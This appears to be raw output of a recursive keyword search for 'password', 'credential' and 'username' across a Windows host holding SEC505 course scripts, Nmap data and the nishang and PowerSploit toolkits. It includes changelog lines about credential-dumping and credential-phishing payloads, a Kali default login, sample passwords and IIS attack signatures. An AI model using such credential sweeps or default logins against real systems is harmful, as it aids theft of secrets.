C:\Python27\NEWS.txt:4796: test_tk or test_ttk_guionly under a username that is not currently logged C:\Python27\NEWS.txt:7185: long passwords. Initial patch by JP St. Pierre. C:\Python27\NEWS.txt:7749: TLS with authentication credentials. C:\Python27\NEWS.txt:11063:- Patch #1698: allow '@' in username parsed by urlparse.py. C:\Python27\NEWS.txt:11144:- When encountering a password-protected robots.txt file the C:\Python27\NEWS.txt:11145: RobotFileParser no longer prompts interactively for a username and C:\Python27\NEWS.txt:11146: password (bug 813986). C:\Python27\NEWS.txt:11240:- Added an optional credentials argument to SMTPHandler, for use with C:\Users\Administrator\Desktop\log.txt:12:C:\Program Files (x86)\Nmap\nselib\data\enterprise_numbers.txt:42994:43124 PasswordBox Inc. C:\Users\Administrator\Desktop\log.txt:13:C:\Program Files (x86)\Nmap\nselib\data\http-folders.txt:563:/password/ C:\Users\Administrator\Desktop\log.txt:14:C:\Program Files (x86)\Nmap\nselib\data\http-folders.txt:564:/passwords/ C:\Users\Administrator\Desktop\log.txt:15:C:\Program Files (x86)\Nmap\nselib\data\rtsp-urls.txt:14:/CAM_ID.password.mp2 C:\Users\Administrator\Desktop\log.txt:16:C:\Program Files (x86)\Nmap\nselib\data\rtsp-urls.txt:178:/user=admin_password=tlJwpbo6_channel=1_stream=0.sdp?real_stream C:\Users\Administrator\Desktop\log.txt:17:C:\Program Files (x86)\Nmap\nselib\data\tftplist.txt:167:password.bin C:\Users\Administrator\Desktop\log.txt:18:C:\Program Files (x86)\Nmap\nselib\data\tftplist.txt:168:password.cfg C:\Users\Administrator\Desktop\log.txt:19:C:\Program Files (x86)\Nmap\nselib\data\tftplist.txt:169:password.ini C:\Users\Administrator\Desktop\log.txt:20:C:\Python27\NEWS.txt:4376:- Issue #13642: Unquote before b64encoding user:password during Basic C:\Users\Administrator\Desktop\log.txt:21:C:\Python27\NEWS.txt:4796: test_tk or test_ttk_guionly under a username that is not currently logged C:\Users\Administrator\Desktop\log.txt:22:C:\Python27\NEWS.txt:7185: long passwords. Initial patch by JP St. Pierre. C:\Users\Administrator\Desktop\log.txt:23:C:\Python27\NEWS.txt:7749: TLS with authentication credentials. C:\Users\Administrator\Desktop\log.txt:24:C:\Python27\NEWS.txt:11063:- Patch #1698: allow '@' in username parsed by urlparse.py. C:\Users\Administrator\Desktop\log.txt:25:C:\Python27\NEWS.txt:11144:- When encountering a password-protected robots.txt file the C:\Users\Administrator\Desktop\log.txt:26:C:\Python27\NEWS.txt:11145: RobotFileParser no longer prompts interactively for a username and C:\Users\Administrator\Desktop\log.txt:27:C:\Python27\NEWS.txt:11146: password (bug 813986). C:\Users\Administrator\Desktop\log.txt:28:C:\Python27\NEWS.txt:11240:- Added an optional credentials argument to SMTPHandler, for use with C:\Users\Administrator\Desktop\log.txt:29:nishang-master\CHANGELOG.txt:32:- Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade. C:\Users\Administrator\Desktop\log.txt:30:nishang-master\CHANGELOG.txt:49:- Removed hard coded credentials from Invoke-PSGcat.ps1 and Invoke-PSGcat in Powerpreter. So embarrassing! C:\Users\Administrator\Desktop\log.txt:31:nishang-master\CHANGELOG.txt:74:- Credentials script renamed to Invoke-CredentialsPhish. C:\Users\Administrator\Desktop\log.txt:32:nishang-master\CHANGELOG.txt:186:- Fixed help in Credentials.ps1 C:\Users\Administrator\Desktop\log.txt:33:nishang-master\CHANGELOG.txt:191:- Fixed a bug in Credentials.ps1 C:\Users\Administrator\Desktop\log.txt:34:nishang-master\CHANGELOG.txt:195:- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated C:\Users\Administrator\Desktop\log.txt:35:locally or at AD, credential prompt is shown again. C:\Users\Administrator\Desktop\log.txt:36:nishang-master\CHANGELOG.txt:208:- Removed delay in the credentials payload's prompt. Now the prompt asking for credentials will keep C:\Users\Administrator\Desktop\log.txt:38:nishang-master\CHANGELOG.txt:210:- Removed hard coded credentials from Credentials.ps1 :| and edited the code to accept user input. C:\Users\Administrator\Desktop\log.txt:39:PowerSploit-master\Recon\Dictionaries\generic.txt:969:password/ C:\Users\Administrator\Desktop\log.txt:40:PowerSploit-master\Recon\Dictionaries\generic.txt:970:passwords/ C:\Users\Administrator\Desktop\log.txt:41:SEC505-Scripts\Laptop-Setup-README-NOW.txt:46:Note: The script will reset your password to "P@ssword" inside the VM. C:\Users\Administrator\Desktop\log.txt:42:SEC505-Scripts\Day1-PowerShell\Examples\signatures.txt:17:iisadmpwd Attempts to access the IIS 4.0 change password scripts C:\Users\Administrator\Desktop\log.txt:44:SEC505-Scripts\Day1-PowerShell\Examples\signatures.txt:47:/\~.+|\%2f\%7e Attempts to use a /~ in a request (possible username C:\Users\Administrator\Desktop\log.txt:46:SEC505-Scripts\Day1-PowerShell\Misc\Sample_PowerShell_Transcript_Log.txt:4:Username: TESTING\TestUser47 C:\Users\Administrator\Desktop\log.txt:47:SEC505-Scripts\Day2-Hardening\IIS\Log_Analysis\Signatures.txt:17:iisadmpwd Attempts to access the IIS 4.0 change password C:\Users\Administrator\Desktop\log.txt:50:username search). C:\Users\Administrator\Desktop\log.txt:51:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:4:The passwords of local administrative accounts should be changed regularly and these C:\Users\Administrator\Desktop\log.txt:52:passwords should be different from one computer to the next. But how can this been done securely and conveniently? How can this be done C:\Users\Administrator\Desktop\log.txt:54:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:15:Copy the Update-PasswordArchive.ps1 script into that shared folder (\\server\share). C:\Users\Administrator\Desktop\log.txt:55:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:17:Using Group Policy, SCCM, a third-party EMS, SCHTASKS.EXE or some other technique, C:\Users\Administrator\Desktop\log.txt:57:command: "powershell.exe \\server\share\update-passwordarchive.ps1 -certificatefilepath \\server\share\cert.cer -passwordarchivepath C:\Users\Administrator\Desktop\log.txt:58:\\server\share -localusername administrator". This resets the password on the local Administrator account, or whatever account is C:\Users\Administrator\Desktop\log.txt:59:specified, with a 15-25 character, random complex password. The password is encrypted in memory with the public key of the certificate C:\Users\Administrator\Desktop\log.txt:61:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:19:When a password for a computer (laptop47) needs to be recovered, the trusted C:\Users\Administrator\Desktop\log.txt:62:administrator should run from their own local computer the following PowerShell script: "recover-passwordarchive.ps1 -passwordarchivepath C:\Users\Administrator\Desktop\log.txt:63:\\server\share -computername laptop47 -username helpdesk". This downloads the necessary encrypted files and decrypts them locally in memory C:\Users\Administrator\Desktop\log.txt:64:using the private key of the administrator, displaying the plaintext password within PowerShell. C:\Users\Administrator\Desktop\log.txt:65:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:26:PowerShell 2.0 or later must be installed on both the computer with the local user C:\Users\Administrator\Desktop\log.txt:66:account whose password is to be reset and also on the administrators' computers who will recover these passwords in plaintext. C:\Users\Administrator\Desktop\log.txt:67:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:28:The Update-PasswordArchive.ps1 script, which resets the password, must run with C:\Users\Administrator\Desktop\log.txt:69:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:41:Copy the \Day2-DAC\UpdatePasswords folder to your hard drive. C:\Users\Administrator\Desktop\log.txt:70:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:43:In File Explorer, double-click the "Password-is-password.pfx" file to import the C:\Users\Administrator\Desktop\log.txt:71:test certificate and private key into your current user store (accept all the defaults). The password is...password. C:\Users\Administrator\Desktop\log.txt:72:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:45:Open PowerShell with administrative privileges and run this command to reset the C:\Users\Administrator\Desktop\log.txt:73:password on the Guest account: C:\Users\Administrator\Desktop\log.txt:74:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:47: .\Update-PasswordArchive.ps1 -LocalUserName Guest -CertificateFilePath C:\Users\Administrator\Desktop\log.txt:76:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:53:If you open the file in Notepad or a hex editor, you'll see that it has been C:\Users\Administrator\Desktop\log.txt:78:user certificate store, hence, you can use your private key to extract the password from the encrypted file. Unless hackers have stolen C:\Users\Administrator\Desktop\log.txt:79:your private key, they will not be able to decrypt the file and obtain the password inside it. C:\Users\Administrator\Desktop\log.txt:80:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:55:To obtain the plaintext password, run this command: C:\Users\Administrator\Desktop\log.txt:81:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:57: .\Recover-PasswordArchive.ps1 -ComputerName $env:computername -UserName Guest C:\Users\Administrator\Desktop\log.txt:82:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:59:The output is an object with the plaintext password and other properties, similar C:\Users\Administrator\Desktop\log.txt:84:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:63: UserName : Guest C:\Users\Administrator\Desktop\log.txt:85:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:68: Password : b4EAti!HiLX]QI2 C:\Users\Administrator\Desktop\log.txt:86:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:70:The password property can now be piped into other commands or copied into the C:\Users\Administrator\Desktop\log.txt:88:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:74: get-help -full .\Update-PasswordArchive.ps1 C:\Users\Administrator\Desktop\log.txt:89:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:81:The password is never sent over the network in plaintext, never saved to disk in C:\Users\Administrator\Desktop\log.txt:90:plaintext, and never exposed as a command-line argument, either when resetting the password or when recovering it later. The new password C:\Users\Administrator\Desktop\log.txt:91:is generated randomly in the memory of the PowerShell process running on the computer where the password is reset. The process runs for C:\Users\Administrator\Desktop\log.txt:93:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:83:Different certificates can be used at different times, as long as their private C:\Users\Administrator\Desktop\log.txt:94:keys are available to the administrator. When recovering a password, the correct certificate and private key will be used automatically. A C:\Users\Administrator\Desktop\log.txt:96:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:85:If the shared folder is not accessible to the computer when the scheduled job runs, C:\Users\Administrator\Desktop\log.txt:97:the password is not reset. C:\Users\Administrator\Desktop\log.txt:98:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:87:If multiple administrators must be able to recover the plaintext passwords, export C:\Users\Administrator\Desktop\log.txt:102:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:91:The update script writes to the Application event log whenever and wherever the C:\Users\Administrator\Desktop\log.txt:103:script is run (Source: PasswordArchive, Event ID: 9013). C:\Users\Administrator\Desktop\log.txt:104:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:93:The script can only be used to reset the passwords of local accounts, not domain C:\Users\Administrator\Desktop\log.txt:106:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:100:Keep the private key for the certificate used to encrypt the password archive C:\Users\Administrator\Desktop\log.txt:108:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:102:If the private key for the certificate is compromised, create a new key pair, C:\Users\Administrator\Desktop\log.txt:110:Policy, SCHTASKS.EXE or some other technique. Once all passwords have been changed, the fact that the old private key has been compromised C:\Users\Administrator\Desktop\log.txt:111:does not mean any current passwords are known. C:\Users\Administrator\Desktop\log.txt:112:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:104:Use an RSA public key which is 2048 bits or larger. The public key encrypts a C:\Users\Administrator\Desktop\log.txt:113:random 256-bit Rijndael key, which encrypts the password. Every file has a different Rijndael key. RSA and Rijndael are used for maximum C:\Users\Administrator\Desktop\log.txt:115:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:106:Prevent modification of the Update-PasswordArchive.ps1 script itself by digitally C:\Users\Administrator\Desktop\log.txt:118:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:108:Attackers may try to corrupt or delete the existing password archive files to C:\Users\Administrator\Desktop\log.txt:119:prevent access to current passwords. Each archive file contains an encrypted SHA256 hash of the username, computername and password in that C:\Users\Administrator\Desktop\log.txt:120:file in order to detect modified or damaged bits; the hash is checked whenever a password is recovered. C:\Users\Administrator\Desktop\log.txt:121:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:127:An attacker might try to generate millions of spoofed archive files and add them C:\Users\Administrator\Desktop\log.txt:126:machines. Besides, the benefit to us of managing local administrative account passwords correctly far exceeds the potential negative of C:\Users\Administrator\Desktop\log.txt:128:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:136:The output of the Recover-PasswordArchive.ps1 script can be piped into other C:\Users\Administrator\Desktop\log.txt:129:scripts to automate other tasks which require the plaintext password, such as executing commands, doing WMI queries, opening an RDP session, C:\Users\Administrator\Desktop\log.txt:130:or immediately resetting the password again when finished. C:\Users\Administrator\Desktop\log.txt:131:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:138:When recovering a password, you can pipe the password into the built-in clip.exe C:\Users\Administrator\Desktop\log.txt:132:utility to put the password into the clipboard, like this: C:\Users\Administrator\Desktop\log.txt:133:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:140: \\controller\password-archives\Recover-PasswordArchive.ps1 ` C:\Users\Administrator\Desktop\log.txt:134:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:141: -PasswordArchivePath \\controller\password-archives -ComputerName laptop47 ` C:\Users\Administrator\Desktop\log.txt:135:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:142: -UserName Administrator | select-object -expandproperty password | clip.exe C:\Users\Administrator\Desktop\log.txt:136:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:144:Keep the number of files in the archive folder manageable by using the C:\Users\Administrator\Desktop\log.txt:137:CleanUp-PasswordArchives.ps1 script. Perhaps running this script as a scheduled job every two or four weeks. C:\Users\Administrator\Desktop\log.txt:138:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:146:To optimize the performance of the Recover-PasswordArchive.ps1 script when there C:\Users\Administrator\Desktop\log.txt:139:are more than 100,000 files in the folder containing the password archives, disable 8.3 file name generation and strip all current 8.3 names C:\Users\Administrator\Desktop\log.txt:141:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:150:You can also perform an immediate password update with commands wrapped in a C:\Users\Administrator\Desktop\log.txt:143:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:153: Invoke-Command -ComputerName laptop47 -filepath .\Update-PasswordArchive.ps1 C:\Users\Administrator\Desktop\log.txt:145:SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:158:The above Invoke-Command can be done by specifying UNC paths instead, but this C:\Users\Administrator\Desktop\log.txt:146:requires delegation of credentials to the remote computer, which is not ideal for limiting token abuse attacks, so the certificate and C:\Users\Administrator\Desktop\log.txt:148:SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:23:529 = Logon Failure: Unknown user name or bad password C:\Users\Administrator\Desktop\log.txt:149:SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:29:535 = The specified account's password has expired C:\Users\Administrator\Desktop\log.txt:150:SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:72:627 = Change Password Attempt C:\Users\Administrator\Desktop\log.txt:151:SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:73:628 = User Account password set C:\Users\Administrator\Desktop\log.txt:152:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:6:Default username is "root", password is "toor". C:\Users\Administrator\Desktop\log.txt:153:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:63: Password, User and Group Management C:\Users\Administrator\Desktop\log.txt:154:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:65:passwd C:\Users\Administrator\Desktop\log.txt:155:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:67:id [] C:\Users\Administrator\Desktop\log.txt:156:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:69:adduser C:\Users\Administrator\Desktop\log.txt:157:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:70:deluser C:\Users\Administrator\Desktop\log.txt:158:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:139:smbclient -U -W //server/share C:\Users\Administrator\Desktop\log.txt:159:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:140:smbclient -U -W //server/share "" C:\Users\Administrator\Desktop\log.txt:160:SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:245:# To install meterpreter with a username and password/hash: C:\Users\Administrator\Desktop\log.txt:161:SEC505-Scripts\Day6-Servers\Kerberos\License.txt:14:MEMBER ACCOUNT, PASSWORD, AND SECURITY C:\Users\Administrator\Desktop\log.txt:162:SEC505-Scripts\Day6-Servers\Kerberos\License.txt:56:MEMBER ACCOUNT, PASSWORD, AND SECURITY C:\Users\Administrator\Desktop\log.txt:165:are entirely responsible for maintaining the confidentiality of your password and account. Furthermore, you are entirely responsible for any C:\Users\Administrator\Desktop\log.txt:167:other breach of security. Microsoft will not be liable for any loss that you may incur as a result of someone else using your password or C:\Users\Administrator\Desktop\log.txt:169:someone else using your account or password. You may not use anyone else's account without the permission of the account holder. C:\Users\Administrator\Desktop\log.txt:174:connected to any Microsoft server or to any of the Services, through hacking, password mining or any other means. You may not obtain or C:\Users\Administrator\Desktop\log.txt:176:SEC505-Scripts\Day6-Servers\Kerberos\README.txt:1:This folder contains a PowerShell script to reset the password of C:\Users\Administrator\Desktop\log.txt:177:SEC505-Scripts\Extras\VBScript\passwords.txt:1:password C:\Users\Administrator\Desktop\log.txt:178:SEC505-Scripts\Extras\VBScript\signatures.txt:17:iisadmpwd attempts to access the IIS 4.0 change password scripts C:\Users\Administrator\Desktop\log.txt:180:SEC505-Scripts\Extras\VBScript\signatures.txt:47:/\~.+|\%2f\%7e attempts to use a /~ in a request (possible username search). C:\Users\Administrator\Desktop\log.txt:182:Sysinternals tools may include personally identifiable or other sensitive information (such as usernames, passwords, paths to files C:\Users\Administrator\Desktop\log.txt:185:SysinternalsSuite\readme.txt:18:Autologon - Bypass password screen during logon. C:\Users\Administrator\Desktop\log.txt:186:SysinternalsSuite\readme.txt:102:PsPasswd - Changes account passwords. C:\Users\Administrator\Desktop\log.txt:187:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Automatic_Variables.help.txt:109: typically C:\Users\. C:\Users\Administrator\Desktop\log.txt:188:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:181: parameter set, a UserName C:\Users\Administrator\Desktop\log.txt:190:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:194: $UserName, C:\Users\Administrator\Desktop\log.txt:191:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:220: $UserName, C:\Users\Administrator\Desktop\log.txt:192:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:561: $UserName C:\Users\Administrator\Desktop\log.txt:193:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_OutputTypeAttribute.help.txt:133: $UserName C:\Users\Administrator\Desktop\log.txt:195:credentials. It C:\Users\Administrator\Desktop\log.txt:196:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Jobs.help.txt:305: credentials to run the command. The value of the Reason C:\Users\Administrator\Desktop\log.txt:198:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Language_Modes.help.txt:172: PSCredential C:\Users\Administrator\Desktop\log.txt:199:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Pipelines.help.txt:367: Parameter [Credential] PIPELINE INPUT C:\Users\Administrator\Desktop\log.txt:201:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Preference_Variables.help.txt:1084: ProxyCredential : C:\Users\Administrator\Desktop\log.txt:203:credentials of a member of C:\Users\Administrator\Desktop\log.txt:204:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:142: only if you can supply the credentials of the user C:\Users\Administrator\Desktop\log.txt:206:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:144: includes RunAs credentials. Otherwise, you can C:\Users\Administrator\Desktop\log.txt:209:credentials that were used C:\Users\Administrator\Desktop\log.txt:211:credentials of C:\Users\Administrator\Desktop\log.txt:212:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:63: name and password credentials on the local computer or the C:\Users\Administrator\Desktop\log.txt:213:credentials C:\Users\Administrator\Desktop\log.txt:214:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:65: The credentials and the rest of the transmission are C:\Users\Administrator\Desktop\log.txt:216:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:513: to use the Credential parameter of the Invoke-Command, C:\Users\Administrator\Desktop\log.txt:218:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:514: or Enter-PSSession cmdlets to provide the credentials of C:\Users\Administrator\Desktop\log.txt:220:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:521: credentials. C:\Users\Administrator\Desktop\log.txt:221:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Requirements.help.txt:62: provide the credentials of an administrator. C:\Users\Administrator\Desktop\log.txt:223:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:273: HOW TO PROVIDE ADMINISTRATOR CREDENTIALS C:\Users\Administrator\Desktop\log.txt:224:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:279: computer. Credentials are sometimes required C:\Users\Administrator\Desktop\log.txt:226:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:283: computer, or can provide the credentials of a C:\Users\Administrator\Desktop\log.txt:228:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:284: group, use the Credential parameter of the C:\Users\Administrator\Desktop\log.txt:231:the credentials of an C:\Users\Administrator\Desktop\log.txt:233:-Credential Domain01\Admin01 C:\Users\Administrator\Desktop\log.txt:234:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:292: For more information about the Credential C:\Users\Administrator\Desktop\log.txt:236:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:374: 2. Use the Credential parameter in all remote C:\Users\Administrator\Desktop\log.txt:239:submitting the credentials C:\Users\Administrator\Desktop\log.txt:240:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:400: 2. Verify that a password is set on the C:\Users\Administrator\Desktop\log.txt:242:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:401: password is not set or the password value C:\Users\Administrator\Desktop\log.txt:244:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:404: To set password for your user account, use C:\Users\Administrator\Desktop\log.txt:246:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:408: 3. Use the Credential parameter in all remote C:\Users\Administrator\Desktop\log.txt:249:submitting the credentials C:\Users\Administrator\Desktop\log.txt:250:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:544: -- ProxyCredential C:\Users\Administrator\Desktop\log.txt:252:ProxyAuthentication, and ProxyCredential C:\Users\Administrator\Desktop\log.txt:254:-ProxyCredential Domain01\User01 C:\Users\Administrator\Desktop\log.txt:255:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:44: function ScreenPassword($instance) C:\Users\Administrator\Desktop\log.txt:257:ScreenPassword($a) } C:\Users\Administrator\Desktop\log.txt:258:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:53: This script checks each user account. The ScreenPassword C:\Users\Administrator\Desktop\log.txt:261:password-protected C:\Users\Administrator\Desktop\log.txt:262:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:55: screen saver. If the screen saver is password protected, the C:\Users\Administrator\Desktop\log.txt:264:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:529: $Cred = Get-Credential C:\Users\Administrator\Desktop\log.txt:265:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:530: Invoke-Command $s {Remove-Item .\Test*.ps1 -Credential C:\Users\Administrator\Desktop\log.txt:267:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:537: $Cred = Get-Credential C:\Users\Administrator\Desktop\log.txt:269:-Credential $c} -ArgumentList $Cred C:\Users\Administrator\Desktop\log.txt:270:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Script_Internationalization.help.txt:157:if (!($username)) { $msgTable.promptMsg } C:\Users\Administrator\Desktop\log.txt:272:can supply the credentials of a C:\Users\Administrator\Desktop\log.txt:273:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Session_Configuration_Files.help.txt:230: RunAsPassword C:\Users\Administrator\Desktop\log.txt:274:NoteProperty System.String RunAsPassword= C:\Users\Administrator\Desktop\log.txt:276:password. The C:\Users\Administrator\Desktop\log.txt:277:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:174: password ensures that no one can use or access the C:\Users\Administrator\Desktop\log.txt:279:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:175: your consent. Create and enter a password that you can C:\Users\Administrator\Desktop\log.txt:281:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:176: use this password later to retrieve the certificate. C:\Users\Administrator\Desktop\log.txt:282:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:277: 6. Type a password, and then type it again to confirm. C:\Users\Administrator\Desktop\log.txt:283:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:293: 4. On the Password page, select "Enable strong private C:\Users\Administrator\Desktop\log.txt:285:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:294: and then enter the password that you assigned during C:\Users\Administrator\Desktop\log.txt:288:UseDefaultCredentials C:\Users\Administrator\Desktop\log.txt:289:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:157: parameter that provides the explicit credentials of C:\Users\Administrator\Desktop\log.txt:292:Credential C:\Users\Administrator\Desktop\log.txt:293:C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:164: Credential parameter is valid only when you use the C:\Users\Administrator\Desktop\log.txt:295:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory.hel p.txt:32: Account and Password Policy C:\Users\Administrator\Desktop\log.txt:298:Remove-ADFineGrainedPasswordPolicy. C:\Users\Administrator\Desktop\log.txt:300:bad password count greater than five: C:\Users\Administrator\Desktop\log.txt:302:ADFineGrainedPasswordPolicy C:\Users\Administrator\Desktop\log.txt:304:(sAMUserName) C:\Users\Administrator\Desktop\log.txt:306:ADFineGrainedPasswordPolicy C:\Users\Administrator\Desktop\log.txt:308:ADDefaultDomainPasswordPolicy C:\Users\Administrator\Desktop\log.txt:310:ADFineGrainedPasswordPolicy C:\Users\Administrator\Desktop\log.txt:312:fine grained password policy object; that is, an AD C:\Users\Administrator\Desktop\log.txt:314:msDS-PasswordSettings in AD DS and is derived from C:\Users\Administrator\Desktop\log.txt:316:ADFineGrainedPasswordPolicy may contain the following properties in C:\Users\Administrator\Desktop\log.txt:318:attribute: msDS-PasswordComplexityEnabled C:\Users\Administrator\Desktop\log.txt:319:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_Obj ectModel.help.txt:215: MaxPasswordAge C:\Users\Administrator\Desktop\log.txt:322:attribute: msDS-MaximumPasswordAge C:\Users\Administrator\Desktop\log.txt:323:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_Obj ectModel.help.txt:218: MinPasswordAge C:\Users\Administrator\Desktop\log.txt:326:attribute: msDS-MinimumPasswordAge C:\Users\Administrator\Desktop\log.txt:328:MinPasswordLength - A property of type System.Int32, derived from the C:\Users\Administrator\Desktop\log.txt:330:attribute: msDS-MinimumPasswordLength C:\Users\Administrator\Desktop\log.txt:332:PasswordHistoryCount - A property of type System.Int32, derived from C:\Users\Administrator\Desktop\log.txt:334:attribute: msDS-PasswordHistoryLength C:\Users\Administrator\Desktop\log.txt:336:attribute: msDS-PasswordSettingsPrecedence C:\Users\Administrator\Desktop\log.txt:338:msDS-PasswordReversibleEncryptionEnabled C:\Users\Administrator\Desktop\log.txt:340:AllowReversiblePasswordEncryption - A property of type System.Boolean, C:\Users\Administrator\Desktop\log.txt:342:ms-DS-UserEncryptedTextPasswordAllowed C:\Users\Administrator\Desktop\log.txt:344:CannotChangePassword - A property of type System.Boolean, derived from C:\Users\Administrator\Desktop\log.txt:346:LastBadPasswordAttempt - A property of type System.DateTime, derived C:\Users\Administrator\Desktop\log.txt:348:directory attribute: badPasswordTime C:\Users\Administrator\Desktop\log.txt:350:PasswordExpired - A property of type System.Boolean, for AD DS it is C:\Users\Administrator\Desktop\log.txt:352:attribute msDS-UserPasswordExpired C:\Users\Administrator\Desktop\log.txt:354:PasswordLastSet - A property of type System.DateTime, derived from the 